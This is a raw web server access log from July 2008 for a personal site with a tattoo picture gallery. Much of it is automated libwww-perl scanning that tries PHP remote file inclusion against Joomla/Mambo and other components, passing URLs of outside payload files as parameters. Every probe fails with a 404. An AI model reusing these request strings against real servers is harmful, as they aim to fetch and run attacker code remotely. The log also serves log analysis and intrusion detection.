217.67.237.142 - - [10/Jul/2008:19:01:19 -0500] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.accentaroom.com/bbs/skin/df??? HTTP/1.1" 404 328 "-""libwww-perl/5.811"
217.67.237.142 - - [10/Jul/2008:19:01:19 -0500] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.accentaroom.com/bbs/skin/df??? HTTP/1.1" 404 323 "-""libwww-perl/5.811"
74.6.8.88 - - [10/Jul/2008:19:01:20 -0500] "GET /logs/access_log.1167609600 HTTP/1.0" 200 186730 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
203.255.230.8 - - [10/Jul/2008:19:02:27 -0500] "GET //errors.php?error=http://www.community.nigeria.com//forums/Packages/data/id3.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.79"
74.54.20.194 - - [10/Jul/2008:19:02:48 -0500] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.accentaroom.com/bbs/skin/df??? HTTP/1.1" 404 328 "-""libwww-perl/5.810"
74.54.20.194 - - [10/Jul/2008:19:02:48 -0500] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.accentaroom.com/bbs/skin/df??? HTTP/1.1" 404 323 "-""libwww-perl/5.810"
88.191.75.245 - - [10/Jul/2008:19:02:59 -0500] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.accentaroom.com/bbs/skin/df??? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
88.191.75.245 - - [10/Jul/2008:19:02:59 -0500] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.accentaroom.com/bbs/skin/df??? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
69.57.189.226 - - [10/Jul/2008:19:07:20 -0500] "GET /logs/index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.richandrowdyretirement.com/rss.php/index.php/echo? HTTP/1.1" 404 298 "-""libwww-perl/5.810"
69.57.189.226 - - [10/Jul/2008:19:07:25 -0500] "GET /index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.richandrowdyretirement.com/rss.php/index.php/echo? HTTP/1.1" 404 293 "-""libwww-perl/5.810"
87.238.199.56 - - [10/Jul/2008:19:08:23 -0500] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.nipservers.com/modules/Forums/admin/echo.txt???? HTTP/1.1" 404 365 "-""libwww-perl/5.803"
87.238.199.56 - - [10/Jul/2008:19:08:23 -0500] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.nipservers.com/modules/Forums/admin/echo.txt???? HTTP/1.1" 404 360 "-""libwww-perl/5.803"
77.232.68.10 - - [10/Jul/2008:19:13:08 -0500] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://h1.ripway.com/cmdid/idvscan.txt? HTTP/1.1" 404 365 "-""libwww-perl/5.805"
77.232.68.10 - - [10/Jul/2008:19:13:08 -0500] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://h1.ripway.com/cmdid/idvscan.txt? HTTP/1.1" 404 360 "-""libwww-perl/5.805"
74.6.18.222 - - [10/Jul/2008:19:13:21 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.31.166 - - [10/Jul/2008:19:13:21 -0500] "GET / HTTP/1.0" 200 1231 "-""Mozilla/5.0 (compatible; Yahoo! DE Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
77.221.130.6 - - [10/Jul/2008:19:13:25 -0500] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://h1.ripway.com/cmdid/idvscan.txt? HTTP/1.1" 404 365 "-""libwww-perl/5.803"
77.221.130.6 - - [10/Jul/2008:19:13:26 -0500] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://h1.ripway.com/cmdid/idvscan.txt? HTTP/1.1" 404 360 "-""libwww-perl/5.803"
205.234.197.96 - - [10/Jul/2008:19:13:59 -0500] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://lutheranthrift.org/counter/safe.txt?? HTTP/1.1" 404 365 "-""libwww-perl/5.810"
205.234.197.96 - - [10/Jul/2008:19:13:59 -0500] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://lutheranthrift.org/counter/safe.txt?? HTTP/1.1" 404 360 "-""libwww-perl/5.810"
89.111.173.117 - - [10/Jul/2008:19:17:09 -0500] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://h1.ripway.com/cmdid/idvscan.txt? HTTP/1.1" 404 365 "-""libwww-perl/5.805"
89.111.173.117 - - [10/Jul/2008:19:17:09 -0500] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://h1.ripway.com/cmdid/idvscan.txt? HTTP/1.1" 404 360 "-""libwww-perl/5.805"
200.143.15.240 - - [10/Jul/2008:19:17:16 -0500] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://h1.ripway.com/cmdid/idvscan.txt? HTTP/1.1" 404 365 "-""libwww-perl/5.805"
200.143.15.240 - - [10/Jul/2008:19:17:17 -0500] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://h1.ripway.com/cmdid/idvscan.txt? HTTP/1.1" 404 360 "-""libwww-perl/5.805"
82.194.70.164 - - [10/Jul/2008:19:18:25 -0500] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://lutheranthrift.org/counter/safe.txt? HTTP/1.1" 404 365 "-""libwww-perl/5.805"
82.194.70.164 - - [10/Jul/2008:19:18:26 -0500] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://lutheranthrift.org/counter/safe.txt? HTTP/1.1" 404 360 "-""libwww-perl/5.805"
200.143.15.240 - - [10/Jul/2008:19:20:51 -0500] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://h1.ripway.com/cmdid/idvscan.txt? HTTP/1.1" 404 365 "-""libwww-perl/5.805"
200.143.15.240 - - [10/Jul/2008:19:20:52 -0500] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://h1.ripway.com/cmdid/idvscan.txt? HTTP/1.1" 404 360 "-""libwww-perl/5.805"
77.232.68.10 - - [10/Jul/2008:19:20:53 -0500] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://h1.ripway.com/cmdid/idvscan.txt? HTTP/1.1" 404 365 "-""libwww-perl/5.805"
77.232.68.10 - - [10/Jul/2008:19:20:54 -0500] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://h1.ripway.com/cmdid/idvscan.txt? HTTP/1.1" 404 360 "-""libwww-perl/5.805"
194.143.183.8 - - [10/Jul/2008:19:22:00 -0500] "GET /logs/access_log.1207785600/%22/modules.phphttp://www.tiptopwendys.co.za/ips.txt? HTTP/1.1" 404 361 "-""libwww-perl/5.79"
81.29.195.59 - - [10/Jul/2008:19:22:52 -0500] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://81.169.162.164/typo3conf/l10n/sys_cr4nk/i? HTTP/1.1" 404 362 "-""cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]"
81.29.195.59 - - [10/Jul/2008:19:22:53 -0500] "GET /logs/errors.php?error=http://81.169.162.164/typo3conf/l10n/sys_cr4nk/i? HTTP/1.1" 404 299 "-""cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]"
81.29.195.59 - - [10/Jul/2008:19:22:53 -0500] "GET ///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://81.169.162.164/typo3conf/l10n/sys_cr4nk/i? HTTP/1.1" 404 357 "-""cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]"
81.29.195.59 - - [10/Jul/2008:19:22:53 -0500] "GET /errors.php?error=http://81.169.162.164/typo3conf/l10n/sys_cr4nk/i? HTTP/1.1" 404 294 "-""cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]"
87.106.98.71 - - [10/Jul/2008:19:23:15 -0500] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 404 365 "-""libwww-perl/5.805"
87.106.98.71 - - [10/Jul/2008:19:23:16 -0500] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 404 360 "-""libwww-perl/5.805"
87.106.98.71 - - [10/Jul/2008:19:23:19 -0500] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 404 365 "-""libwww-perl/5.805"
87.106.98.71 - - [10/Jul/2008:19:23:19 -0500] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 404 360 "-""libwww-perl/5.805"
83.98.156.151 - - [10/Jul/2008:19:23:58 -0500] "GET //includes/ktedit/toolbar.php?dirDepth=http://www.iglesialcs.cl/newweb/images/help01.txt??? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
83.98.156.151 - - [10/Jul/2008:19:23:58 -0500] "GET /logs//includes/ktedit/toolbar.php?dirDepth=http://www.iglesialcs.cl/newweb/images/help01.txt??? HTTP/1.1" 404 317 "-""libwww-perl/5.805"
77.221.130.6 - - [10/Jul/2008:19:25:04 -0500] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://h1.ripway.com/cmdid/idvscan.txt? HTTP/1.1" 404 365 "-""libwww-perl/5.803"
77.221.130.6 - - [10/Jul/2008:19:25:04 -0500] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://h1.ripway.com/cmdid/idvscan.txt? HTTP/1.1" 404 360 "-""libwww-perl/5.803"
217.160.200.228 - - [10/Jul/2008:19:25:49 -0500] "GET /logs/access_log.1207785600/%22/modules.phphttp://www.tiptopwendys.co.za/ips.txt? HTTP/1.1" 404 361 "-""libwww-perl/5.803"
87.106.101.24 - - [10/Jul/2008:19:26:09 -0500] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 404 365 "-""libwww-perl/5.805"
87.106.101.24 - - [10/Jul/2008:19:26:09 -0500] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 404 360 "-""libwww-perl/5.805"
87.106.101.24 - - [10/Jul/2008:19:26:56 -0500] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 404 365 "-""libwww-perl/5.805"
87.106.101.24 - - [10/Jul/2008:19:26:56 -0500] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 404 360 "-""libwww-perl/5.805"
89.111.173.117 - - [10/Jul/2008:19:28:59 -0500] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://h1.ripway.com/cmdid/idvscan.txt? HTTP/1.1" 404 365 "-""libwww-perl/5.805"
89.111.173.117 - - [10/Jul/2008:19:28:59 -0500] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://h1.ripway.com/cmdid/idvscan.txt? HTTP/1.1" 404 360 "-""libwww-perl/5.805"
66.98.250.45 - - [10/Jul/2008:19:32:13 -0500] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://www.elektropoechhacker.at/mambo/bajo.txt?? HTTP/1.1" 404 316 "-""libwww-perl/5.65"
66.98.250.45 - - [10/Jul/2008:19:32:13 -0500] "GET /includes/ktedit/toolbar.php?dirDepth=http://www.elektropoechhacker.at/mambo/bajo.txt?? HTTP/1.1" 404 311 "-""libwww-perl/5.65"
81.187.167.130 - - [10/Jul/2008:19:32:31 -0500] "GET /logs/modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=http://bryanmukandi.com/readme1.txt? HTTP/1.1" 404 343 "-""libwww-perl/5.808"
81.187.167.130 - - [10/Jul/2008:19:32:31 -0500] "GET /modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=http://bryanmukandi.com/readme1.txt? HTTP/1.1" 404 338 "-""libwww-perl/5.808"
83.98.156.151 - - [10/Jul/2008:19:33:27 -0500] "GET /logs//includes/ktedit/toolbar.php?dirDepth=http://www.iglesialcs.cl/newweb/images/help01.txt??? HTTP/1.1" 404 317 "-""libwww-perl/5.805"
83.98.156.151 - - [10/Jul/2008:19:33:27 -0500] "GET //includes/ktedit/toolbar.php?dirDepth=http://www.iglesialcs.cl/newweb/images/help01.txt??? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
69.72.144.162 - - [10/Jul/2008:19:33:45 -0500] "GET /logs//includes/ktedit/toolbar.php?dirDepth=http://www.iglesialcs.cl/newweb/images/help01.txt??? HTTP/1.1" 404 317 "-""libwww-perl/5.810"
69.72.144.162 - - [10/Jul/2008:19:33:45 -0500] "GET //includes/ktedit/toolbar.php?dirDepth=http://www.iglesialcs.cl/newweb/images/help01.txt??? HTTP/1.1" 404 312 "-""libwww-perl/5.810"
85.119.244.16 - - [10/Jul/2008:19:35:01 -0500] "GET /logs/ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://findaone.com/ray/modules/im/sql.txt? HTTP/1.1" 404 324 "-""libwww-perl/5.79"
85.119.244.16 - - [10/Jul/2008:19:35:01 -0500] "GET /ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://findaone.com/ray/modules/im/sql.txt? HTTP/1.1" 404 319 "-""libwww-perl/5.79"
89.188.110.128 - - [10/Jul/2008:19:37:01 -0500] "GET /logs/ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://findaone.com/ray/modules/im/sql.txt? HTTP/1.1" 404 324 "-""libwww-perl/5.805"
89.188.110.128 - - [10/Jul/2008:19:37:02 -0500] "GET /ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://findaone.com/ray/modules/im/sql.txt? HTTP/1.1" 404 319 "-""libwww-perl/5.805"
89.188.110.128 - - [10/Jul/2008:19:37:56 -0500] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://findaone.com/ray/modules/im/sql.txt? HTTP/1.1" 404 316 "-""libwww-perl/5.805"
89.188.110.128 - - [10/Jul/2008:19:37:56 -0500] "GET /includes/ktedit/toolbar.php?dirDepth=http://findaone.com/ray/modules/im/sql.txt? HTTP/1.1" 404 311 "-""libwww-perl/5.805"
59.126.172.166 - - [10/Jul/2008:19:38:01 -0500] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://www.tiptopwendys.co.za/ips.txt?? HTTP/1.1" 404 316 "-""libwww-perl/5.805"
59.126.172.166 - - [10/Jul/2008:19:38:02 -0500] "GET /includes/ktedit/toolbar.php?dirDepth=http://www.tiptopwendys.co.za/ips.txt?? HTTP/1.1" 404 311 "-""libwww-perl/5.805"
208.68.3.10 - - [10/Jul/2008:19:41:58 -0500] "GET /modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=http://bryanmukandi.com/readme1.txt???? HTTP/1.1" 404 338 "-""libwww-perl/5.79"
208.68.3.10 - - [10/Jul/2008:19:41:59 -0500] "GET /logs/modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=http://bryanmukandi.com/readme1.txt???? HTTP/1.1" 404 343 "-""libwww-perl/5.79"
211.20.85.150 - - [10/Jul/2008:19:43:12 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; MSIECrawler)"
70.87.197.18 - - [10/Jul/2008:19:44:06 -0500] "GET /logs//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 325 "-""libwww-perl/5.810"
70.87.197.18 - - [10/Jul/2008:19:44:07 -0500] "GET //ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 320 "-""libwww-perl/5.810"
82.194.70.164 - - [10/Jul/2008:19:44:34 -0500] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.lisey.ca/sohoadmin/safe.txt? HTTP/1.1" 404 365 "-""libwww-perl/5.805"
82.194.70.164 - - [10/Jul/2008:19:44:35 -0500] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.lisey.ca/sohoadmin/safe.txt? HTTP/1.1" 404 360 "-""libwww-perl/5.805"
65.55.208.136 - - [10/Jul/2008:19:44:38 -0500] "GET /logs/access_log.1163721600 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
82.194.70.164 - - [10/Jul/2008:19:45:27 -0500] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.lisey.ca/sohoadmin/safe.txt?? HTTP/1.1" 404 365 "-""libwww-perl/5.805"
82.194.70.164 - - [10/Jul/2008:19:45:27 -0500] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.lisey.ca/sohoadmin/safe.txt?? HTTP/1.1" 404 360 "-""libwww-perl/5.805"
62.44.72.247 - - [10/Jul/2008:19:45:41 -0500] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://sujianto.com/xpl/load.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.803"
62.44.72.247 - - [10/Jul/2008:19:45:41 -0500] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://sujianto.com/xpl/load.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.803"
87.239.10.63 - - [10/Jul/2008:19:46:17 -0500] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1" 404 365 "-""libwww-perl/5.805"
87.239.10.63 - - [10/Jul/2008:19:46:17 -0500] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1" 404 360 "-""libwww-perl/5.805"
68.77.21.242 - - [10/Jul/2008:19:46:36 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3776 "http://o.webring.com/hub?ring=tattoos""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322; InfoPath.2; yplus 5.1.04b)"
68.77.21.242 - - [10/Jul/2008:19:46:37 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322; InfoPath.2; yplus 5.1.04b)"
68.77.21.242 - - [10/Jul/2008:19:46:37 -0500] "GET /tattoo/webring.jpg HTTP/1.1" 200 13114 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322; InfoPath.2; yplus 5.1.04b)"
68.77.21.242 - - [10/Jul/2008:19:46:50 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322; InfoPath.2)"
68.77.21.242 - - [10/Jul/2008:19:47:06 -0500] "GET /tattoo/set2.htm HTTP/1.1" 200 2378 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322; InfoPath.2; yplus 5.1.04b)"
68.77.21.242 - - [10/Jul/2008:19:47:06 -0500] "GET /tattoo/tatb1.JPG HTTP/1.1" 200 14848 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322; InfoPath.2; yplus 5.1.04b)"
68.77.21.242 - - [10/Jul/2008:19:47:06 -0500] "GET /tattoo/tatb10.JPG HTTP/1.1" 200 17887 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322; InfoPath.2; yplus 5.1.04b)"
68.77.21.242 - - [10/Jul/2008:19:47:06 -0500] "GET /tattoo/tatb2.JPG HTTP/1.1" 200 16592 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322; InfoPath.2; yplus 5.1.04b)"
68.77.21.242 - - [10/Jul/2008:19:47:07 -0500] "GET /tattoo/tatb3.JPG HTTP/1.1" 200 16163 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322; InfoPath.2; yplus 5.1.04b)"
68.77.21.242 - - [10/Jul/2008:19:47:07 -0500] "GET /tattoo/tatb4.JPG HTTP/1.1" 200 15705 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322; InfoPath.2; yplus 5.1.04b)"
68.77.21.242 - - [10/Jul/2008:19:47:07 -0500] "GET /tattoo/tatb5.JPG HTTP/1.1" 200 20135 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322; InfoPath.2; yplus 5.1.04b)"
68.77.21.242 - - [10/Jul/2008:19:47:07 -0500] "GET /tattoo/tatb6.JPG HTTP/1.1" 200 21190 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322; InfoPath.2; yplus 5.1.04b)"
68.77.21.242 - - [10/Jul/2008:19:47:07 -0500] "GET /tattoo/tatb7.JPG HTTP/1.1" 200 16193 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322; InfoPath.2; yplus 5.1.04b)"
68.77.21.242 - - [10/Jul/2008:19:47:08 -0500] "GET /tattoo/tatb8.JPG HTTP/1.1" 200 18467 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322; InfoPath.2; yplus 5.1.04b)"
68.77.21.242 - - [10/Jul/2008:19:47:08 -0500] "GET /tattoo/tatb9.JPG HTTP/1.1" 200 21598 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322; InfoPath.2; yplus 5.1.04b)"
88.255.236.6 - - [10/Jul/2008:19:48:09 -0500] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.hotelsunflower.it/includes/ons.txt? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
68.77.21.242 - - [10/Jul/2008:19:48:09 -0500] "GET /tattoo/set3.htm HTTP/1.1" 200 2177 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322; InfoPath.2; yplus 5.1.04b)"
68.77.21.242 - - [10/Jul/2008:19:48:09 -0500] "GET /tattoo/tatc1.JPG HTTP/1.1" 200 21412 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322; InfoPath.2; yplus 5.1.04b)"
68.77.21.242 - - [10/Jul/2008:19:48:10 -0500] "GET /tattoo/tatc10.JPG HTTP/1.1" 200 14157 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322; InfoPath.2; yplus 5.1.04b)"
88.255.236.6 - - [10/Jul/2008:19:48:10 -0500] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.hotelsunflower.it/includes/ons.txt? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
68.77.21.242 - - [10/Jul/2008:19:48:10 -0500] "GET /tattoo/tatc2.JPG HTTP/1.1" 200 17893 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322; InfoPath.2; yplus 5.1.04b)"
68.77.21.242 - - [10/Jul/2008:19:48:10 -0500] "GET /tattoo/tatc3.JPG HTTP/1.1" 200 16313 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322; InfoPath.2; yplus 5.1.04b)"
68.77.21.242 - - [10/Jul/2008:19:48:10 -0500] "GET /tattoo/tatc4.JPG HTTP/1.1" 200 12619 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322; InfoPath.2; yplus 5.1.04b)"
68.77.21.242 - - [10/Jul/2008:19:48:10 -0500] "GET /tattoo/tatc8.JPG HTTP/1.1" 200 17057 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322; InfoPath.2; yplus 5.1.04b)"
68.77.21.242 - - [10/Jul/2008:19:48:11 -0500] "GET /tattoo/tatc6.JPG HTTP/1.1" 200 14549 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322; InfoPath.2; yplus 5.1.04b)"
68.77.21.242 - - [10/Jul/2008:19:48:11 -0500] "GET /tattoo/tatc7.JPG HTTP/1.1" 200 12347 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322; InfoPath.2; yplus 5.1.04b)"
68.77.21.242 - - [10/Jul/2008:19:48:11 -0500] "GET /tattoo/tatc9.JPG HTTP/1.1" 200 18139 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322; InfoPath.2; yplus 5.1.04b)"
68.77.21.242 - - [10/Jul/2008:19:48:11 -0500] "GET /tattoo/tatc5.JPG HTTP/1.1" 200 19436 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322; InfoPath.2; yplus 5.1.04b)"
68.77.21.242 - - [10/Jul/2008:19:48:36 -0500] "GET /tattoo/set4.htm HTTP/1.1" 200 1762 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322; InfoPath.2; yplus 5.1.04b)"
68.77.21.242 - - [10/Jul/2008:19:48:37 -0500] "GET /tattoo/tatd1.JPG HTTP/1.1" 200 14507 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322; InfoPath.2; yplus 5.1.04b)"
68.77.21.242 - - [10/Jul/2008:19:48:37 -0500] "GET /tattoo/tatd2.JPG HTTP/1.1" 200 14891 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322; InfoPath.2; yplus 5.1.04b)"
